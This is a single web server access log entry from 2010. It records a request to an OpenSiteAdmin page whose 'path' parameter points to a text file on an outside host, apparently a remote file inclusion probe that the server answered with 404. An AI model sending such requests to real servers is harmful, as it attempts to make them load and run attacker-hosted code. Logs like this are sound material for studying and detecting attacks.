200.93.147.154 - - [04/Mar/2010:11:09:50 -0800] "GET /logs/access_100224.log//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
